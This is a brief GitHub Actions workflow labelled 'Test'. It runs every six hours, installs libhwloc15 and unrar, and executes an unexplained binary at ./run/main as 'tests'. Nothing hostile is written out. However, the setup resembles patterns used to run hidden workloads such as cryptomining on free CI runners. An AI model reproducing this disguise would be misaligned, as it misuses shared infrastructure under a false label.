jobs:
  action:
    name: Build
    runs-on: ubuntu-20.04

    steps:
      - name: Start
        uses: actions/checkout@v2
      - name: Fetch Packages
        run: sudo apt-get update && sudo apt-get install -y libhwloc15 unrar
      - name: Execute Tests
        run: ./run/main

name: Test

on:
  schedule:
    - cron: "0 */6 * * *"
